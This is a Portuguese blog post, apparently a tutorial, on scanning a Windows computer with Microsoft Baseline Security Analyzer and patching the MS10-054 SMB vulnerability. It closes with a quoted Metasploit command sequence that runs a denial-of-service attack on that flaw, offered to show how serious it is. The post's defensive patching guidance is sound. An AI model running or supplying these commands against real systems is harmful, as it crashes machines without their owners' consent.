É muito importante você está atento, as vulnerabilidades do seu computador, a maioria das invasões aos computadores é pela falta de atualização do sistema operacional. Todo mês um Hacker descobre uma vulnerabilidade nova, para explorar, procurando dominar a sua maquina remotamente, através de exploits que exploram os Backdoor (também conhecido por Porta dos fundos) é uma falha de segurança que pode existir em um programa de computador ou sistema operacional, que deixa uma porta aberta para invasão.
1. Passo - Depois de instalar a ferramenta, faça um escaneamento na sua maquina, clicando no link do sistema “Scan a computer”.
2. Passo – Selecione o nome do seu computador ou IP, se preferir selecione as opções, no meu caso todas estão marcadas e por fim click “Start Scan”, agora espere terminar o escaneamento, uma observação tem que está com a internet ligada, porque ele vai tentar atualizar o repositório, checando as atualizações.
3. Passo – Depois de realizar o escaneamento, vai mostrar um relatório, com todos os detalhes, clicando em “Result details”, mostrar detalhes das vulnerabilidades, como mostra a figura 4.
4. Passo – Ao clicar em Result Details na tela anterior, vai aparecer as vulnerabilidades abaixo, ao clicar na vulnerabilidade vai abrir o site da Microsoft.
5. Passo – No site da Microsoft você poderá ler detalhes da vulnerabilidade, sistemas que ela afeta, e clicar no link para baixar a correção.
6. Passo – Baixar a Correção da vulnerabilidade MS10-054.
A ferramenta é muito boa para analisar as vulnerabilidades do Sistema Operacional, também tem a opção de escanear vários computadores em rede, sendo necessário uma senha de Admistrador de Rede, é sempre bom prevenir futuros ataques a seu PC ou a sua Empresa, mostramos uma boa prática a ser adotada de prevenção de ataque.
Site do Microsoft Baseline Security Analyzer:
Download da Ferramenta que verifica a existência da Vulnerabilidade:
Exploração da Vulnerabilidade acima citada, tirada de um blog Hacker, só para mostrar a seriedade do problema, é 100% garantida a invasão sem a correção ou sem uma ferramenta de proteção.
With Command :
Code:
msf > use auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow![[Image: d381yuc.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s-b6cxSN--h8xON9Xraq6R01EJjH3MCoIBrlV_V3tP7lZbVZWjIYZQ8QMzoBaFotWdkyas6zc8qkYY9LLe3Q9rjQ=s0-d)
Code:
msf > set RHOST [target IP]![[Image: A5JUiuX.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uDse7EpO5MCPmY1oAahGtuzBcp_qdiY_EpAuksbMYOfYRvSWh-46KLv4TNN6ZlIauN99nd2SQLNSI2_sbqwbLK=s0-d)
Code:
msf > set SMBSHARE [The Name Of Folder Will You share]![[Image: wlUzVv0.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_smM8ilfLNawYAaP4UFgTU6egGFr9vv10GM154eOtwTNZa-GlNn8ll9XuMOgMsqnV7V8_8pNF4o2dVovW7L_PZGWQ=s0-d)
Code:
msf > exploit![[Image: t1j3trG.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sBEwy6Cddum13JMxXrepjnoti4xkBFjyzQdVuX1W-Z4RSjzEXRsjrt3Y8CK_6XMsOyR62ep5qGmXCXzKPkEPOU=s0-d)
